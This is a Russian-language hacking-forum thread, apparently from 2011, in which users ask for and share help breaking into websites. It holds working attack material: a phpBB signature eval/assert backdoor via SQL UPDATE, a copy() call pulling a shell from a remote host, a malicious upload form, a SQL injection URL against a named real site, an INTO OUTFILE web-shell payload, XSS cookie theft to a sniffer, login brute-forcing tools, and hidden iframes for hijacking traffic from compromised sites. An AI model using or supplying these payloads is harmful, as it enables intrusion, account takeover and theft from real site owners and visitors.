Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. DJ ][akep

    DJ ][akep Member

    Joined:
    27 Jan 2008
    Messages:
    93
    Likes Received:
    20
    Reputations:
    1
    Спасибо огромное! ++
     
  2. теща

    теща Экстрасенс

    Joined:
    14 Sep 2005
    Messages:
    2,027
    Likes Received:
    526
    Reputations:
    285
    тема такая есть веб форма логин пас капчи нету пробил вручную нету все нормально пас из 4х символов другими словами можно сбрутить легко акаунт , вопрос каким софтом ето можно сделать? что актуальное посоветуете ...
     
  3. satana8920

    satana8920 Палач Античата

    Joined:
    22 Sep 2006
    Messages:
    396
    Likes Received:
    138
    Reputations:
    6
    Ребят мне как сделать так что бы шелл залился нормальный человеческий я имею доступ к админке пхпбб форум
    UPDATE phpbb_users SET user_sig_bbcode_uid='(.+)/e\0', user_sig='phpbb:eval(stripslashes($_GET[e]));' WHERE user_id=2;
    че тут поменять и на что ? что бы был шелл всо??? ненадо умничать)
     
  4. Strilo4ka

    Strilo4ka

    Joined:
    5 Apr 2009
    Messages:
    709
    Likes Received:
    729
    Reputations:
    948
    BrutusA2
     
    2 people like this.
  5. теща

    теща Экстрасенс

    Joined:
    14 Sep 2005
    Messages:
    2,027
    Likes Received:
    526
    Reputations:
    285
    скачал AET2

    сайт начинается с https://тутпоставилИПсайта вставил в форму программы сделал пасы и логин , но чет не работает так как надо , капчи нету , что не так ?
    поставил на перебор на TYPE HTTP (Form)
    что не так сделал ?

    там нету протокола https
     
    #18285 теща, 8 Nov 2011
    Last edited: 8 Nov 2011
  6. KolosJey

    KolosJey Member

    Joined:
    21 Dec 2009
    Messages:
    45
    Likes Received:
    42
    Reputations:
    48
    Ты помоему спешишь куда-то постоянно :)
    В этом тоже есть:
    http://la2-shop.ru/categories.php?id_cat=-3'+union+select+version()--+

    А можно узнать зачем использовать $_REQUEST если " уж так надо $_GET оставить" ? )
    Или это какой то приватный метод, онли закрытые группы?

    satana8920: из-за кавычек ошибки не будет. У тебя там stripslashes стоит для этого.
    phpinfo вообще выводит? И что там стоит в урлфайлопен, если да
     
    1 person likes this.
  7. satana8920

    satana8920 Палач Античата

    Joined:
    22 Sep 2006
    Messages:
    396
    Likes Received:
    138
    Reputations:
    6
    пхпинфо вывод отлично allow_url_fopen On стоит :) блин ребят дайте код рабочий :) для заливки шелла плс
     
  8. KolosJey

    KolosJey Member

    Joined:
    21 Dec 2009
    Messages:
    45
    Likes Received:
    42
    Reputations:
    48
    copy('http://сайт с шеллом/shell.txt','./путь/на сервере/в папку с правами на запись/shell.php');
     
  9. Strilo4ka

    Strilo4ka

    Joined:
    5 Apr 2009
    Messages:
    709
    Likes Received:
    729
    Reputations:
    948
    Copy() будет ограничена при safe_mode=on.
    Лучше move_uploaded_file().

    С командной строки можна найти так найти вритабельные директории\файлы(файлы дописать!):

    find . -type d -perm 777 -print
    find . -type f -perm 777 –print

    Если системную команду не выполнить в php есть функция = is_writable(), через нее можна поискать вритабельные.

    <form action="http://host/vulnscript.php?e=move_uploaded_file($_FILES[upload_file][tmp_name],$_POST[ev2]);" method="post" enctype="multipart/form-data">
    <input type="text" name="ev2" value="./style2.php">
    <input name="upload_file" type="file">
    <input type="submit" value="upload">
    </form>
     
  10. Strilo4ka

    Strilo4ka

    Joined:
    5 Apr 2009
    Messages:
    709
    Likes Received:
    729
    Reputations:
    948
    THC-Hydra работает с https. А вообще в гугле много инструментов.
     
  11. KolosJey

    KolosJey Member

    Joined:
    21 Dec 2009
    Messages:
    45
    Likes Received:
    42
    Reputations:
    48
    Да ладно? :)

    Какие именно ограничения будут у copy() и не будут у move_uploaded_file() при сейфмоде не просветите?
     
  12. Mr.Snuffer

    Mr.Snuffer Member

    Joined:
    2 Jul 2010
    Messages:
    140
    Likes Received:
    13
    Reputations:
    0
    Тёща, отпиши в личку, напишу скрипт.
     
  13. =Zeus=

    =Zeus= Member

    Joined:
    10 Aug 2009
    Messages:
    213
    Likes Received:
    54
    Reputations:
    5
    Все привет, у меня чисто теоретический вопрос - нашел сегодня маленький сайтик - голый html, ни одного php-скрипта, 100%. Все что есть - это корневой каталог со страничками и папка /cgi-bin, в ней лежит чей-то шелл.
    Вопрос - каким образом возможно залить его? В .htaccess никакой магии с интерпретацией html как php нет. Права на папку - drwxr-xr-x. Safe mode: OFF если что, система - линукс.
     
  14. tabletkO

    tabletkO Banned

    Joined:
    3 Nov 2011
    Messages:
    83
    Likes Received:
    20
    Reputations:
    11
    =Zeus=,
    через соседей, через саппорт хостинга :)
     
  15. crackforme

    crackforme New Member

    Joined:
    3 Oct 2011
    Messages:
    208
    Likes Received:
    1
    Reputations:
    0
    UPDATE phpbb_users SET user_sig_bbcode_uid='(.+)/e\0', user_sig='phpbb:assert(stripslashes($_REQUEST[cmd]));' WHERE user_id=2;

    сделал восстановление в бд, открыл профиль, на других такого никогда не было

    что за ошибка такая ?

     
  16. aydin-ka

    aydin-ka Elder - Старейшина

    Joined:
    3 May 2009
    Messages:
    316
    Likes Received:
    98
    Reputations:
    29
    Хочу залить шелл через SQL-injection. Нашел на сервере phpinfo. Знаю полный путь.
    Запрос
    Code:
    http://www.site.com/index.php?=1&id=9999999+union+select+1,2,3,4,5,6,7,8,%3C?php%20system%28$_GET[%91cmd%92]%29%20?%3E,10+INTO+OUTFILE%20%27/home/site/public_html/1.php%27%20--
    Запрос идет...открываю http://www.site.com/1.php?cmd=phpinfo {ничего не выводиться}
    В чем ошибка? или я что-то упустил (в настройках сервера какую ту функцию)
     
  17. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886

    phpinfo() это функция, а не константа, после имени идут скобки и " ; "

    + у тебя system, код не eval -ится, не сможешь вывести phpinfo, только системные команды
     
    _________________________
    2 people like this.
  18. Kasper1898

    Kasper1898 New Member

    Joined:
    12 Sep 2011
    Messages:
    25
    Likes Received:
    2
    Reputations:
    0
    кто подскажет в чем проблемма,нашел xss активную попробывал впихуть скрипт в страницу,куки сразу пришли на снифер ,а вот код в странице не сохранился
    xss в POST запросе
     
  19. max9707

    max9707 Banned

    Joined:
    26 Oct 2011
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    Собственно у меня вопрос. Если я имею доступ к одному сайту (или к шаблонам) что мне вставить в php код (какой код шелла) что бы трафик просто сливался на один сайт и все.

    Заранее спасибо!
     
  20. stepashka_

    stepashka_ Мотоциклист

    Joined:
    9 Nov 2009
    Messages:
    1,022
    Likes Received:
    423
    Reputations:
    234
    PHP:
    <iframe src="http://site.ru/" width="0" height="0" frameborder="0"></iframe>
    это для iframe трафа

    PHP:
     <frameset rows="*,0" framespacing="0" border="0" frameborder="NO">  
    <
    frame src="site.com" scrolling="auto" noresize>  
    </
    frameset
    это что бы полностью твой сайт выводился
     
    #18300 stepashka_, 11 Nov 2011
    Last edited: 11 Nov 2011
Thread Status:
Not open for further replies.